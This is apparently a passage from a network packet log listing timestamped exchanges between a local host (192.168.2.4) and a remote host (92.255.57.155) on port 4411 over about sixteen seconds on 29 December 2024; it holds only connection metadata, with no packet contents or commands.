Dec 29, 2024 09:50:21.167105913 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:21.244486094 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:21.245307922 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:21.286185980 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:21.286423922 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:21.372085094 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:21.377397060 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:21.381298065 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:21.496953964 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:21.497174025 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:21.539000988 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:21.539310932 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:21.656721115 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:21.656883955 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:21.658648968 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:21.707287073 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:21.776388884 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:21.777261019 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:21.791441917 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:21.872106075 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:21.940613985 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:21.940751076 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:22.060214996 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:22.413793087 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:22.416425943 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:22.535887957 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:22.535990953 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:22.655343056 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:22.888077974 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:23.007608891 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:23.007654905 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:23.032242060 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:23.032320023 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:23.151725054 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:23.153285980 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:23.218153000 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:23.320537090 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:23.321306944 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:23.362255096 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:23.440561056 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:23.440756083 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:23.483258009 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:23.560050964 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:23.560131073 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:23.651201963 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:23.679605007 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:23.679769039 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:23.770698071 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:23.773294926 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:23.799022913 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:23.801287889 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:23.892854929 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:23.920640945 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:24.138212919 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:24.257579088 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:24.257637978 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:24.337402105 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:24.376980066 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:24.377032042 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:24.496347904 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:24.496398926 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:24.590080023 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:24.590132952 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:24.615786076 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:24.615840912 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:24.709487915 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:24.709729910 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:24.735183954 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:24.826184988 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:24.829087973 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:24.829138994 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:24.920018911 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:24.920073986 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:24.948651075 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:24.948705912 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:25.039447069 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:25.039575100 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:25.124588966 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:25.124769926 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:25.159107924 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:25.244127035 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:25.244381905 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:25.249974966 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:25.372306108 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:25.404567957 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:25.405106068 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:25.410895109 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:25.454605103 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:25.454744101 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:25.524480104 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:25.525094032 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:25.574141979 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:25.621313095 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:25.644376993 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:25.645576954 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:25.735223055 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:25.764939070 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:25.765301943 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:25.889849901 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:26.091140032 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:26.210522890 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:26.216594934 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:26.335941076 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:26.497533083 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:26.542762995 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:26.616846085 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:26.616898060 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:26.736244917 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:26.795032978 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:26.815773964 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:26.935079098 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:26.935146093 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:27.005260944 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:27.054483891 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:27.054544926 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:27.173779964 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:27.175765991 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:27.295303106 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:27.313200951 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:27.431715965 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:27.432431936 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:27.432692051 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:27.551975965 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:27.729998112 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:27.733196020 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:27.852557898 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:27.856740952 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:27.976125956 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:27.984050989 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:27.993192911 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:28.156483889 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:28.156533957 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:28.275835991 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:28.275914907 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:28.349203110 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:28.395256996 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:28.395303965 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:28.515022039 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:28.515067101 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:28.634618044 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:28.634668112 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:28.647855043 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:28.647902966 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:28.796550989 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:28.796597004 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:28.845282078 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:28.915935040 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:28.915977955 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:28.964601040 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:29.035676956 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:29.035726070 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:29.055428028 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:29.170406103 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:29.175074100 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:29.175216913 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:29.265968084 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:29.266100883 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:29.336487055 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:29.336680889 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:29.385226011 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:29.385380030 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:29.455919027 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:29.505083084 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:29.511220932 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:29.567348003 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:29.666378975 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:29.686664104 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:29.686913967 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:29.806221962 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:29.807301998 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:29.926749945 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:30.267599106 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:30.269550085 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:30.388907909 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:30.482067108 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:30.601450920 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:30.601552010 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:30.720959902 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:30.825545073 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:30.933815002 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:30.933866024 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:30.944849968 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:30.944889069 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:31.053483009 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:31.053544998 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:31.064188004 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:31.144315958 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:31.172899961 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:31.173180103 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:31.292455912 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:31.383522987 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:31.388108015 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:31.503068924 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:31.507342100 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:31.507469893 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:31.626768112 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:31.635011911 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:31.635974884 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:31.796471119 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:31.875349045 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:31.994741917 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:32.351876020 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:32.361840963 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:32.481095076 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:33.559895992 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:33.679183006 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:33.919353962 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:34.011259079 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:34.038650036 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:34.039288044 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:34.158612967 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:34.158657074 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:34.278027058 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:34.278078079 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:34.370883942 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:34.370938063 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:34.397377968 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:34.397418976 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:34.490246058 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:34.490288019 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:34.571948051 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:34.617666960 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:34.617712975 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:34.691200018 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:34.691246033 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:34.737023115 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:34.737075090 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:34.810574055 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:34.820319891 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:34.872096062 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:34.910856009 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:34.910964012 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:35.030539036 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:35.030635118 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:35.163163900 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:35.167387009 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:35.356664896 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:35.360061884 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:35.360527992 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:35.479562998 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:35.479655027 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:35.599087954 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:35.951246977 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:36.070936918 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:36.184987068 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:36.304275036 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:36.402690887 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:36.403723001 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:36.522975922 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:36.544271946 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:36.636704922 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:36.663516045 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:36.663563013 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:36.782844067 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:36.782901049 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:36.902127028 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:36.935113907 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:37.028152943 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:37.028213978 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:37.054379940 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:37.054425955 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:37.147789001 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:37.173732042 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:37.264888048 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:37.269207954 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:37.358340979 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:37.388436079 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:37.388514042 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:37.507777929 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:37.507874012 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:37.518901110 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:37.559602976 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:37.668549061 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:37.668637037 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
Dec 29, 2024 09:50:37.718652010 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:37.788044930 CET | 4411 | 49730 | 92.255.57.155 | 192.168.2.4 |
Dec 29, 2024 09:50:37.788141966 CET | 49730 | 4411 | 192.168.2.4 | 92.255.57.155 |
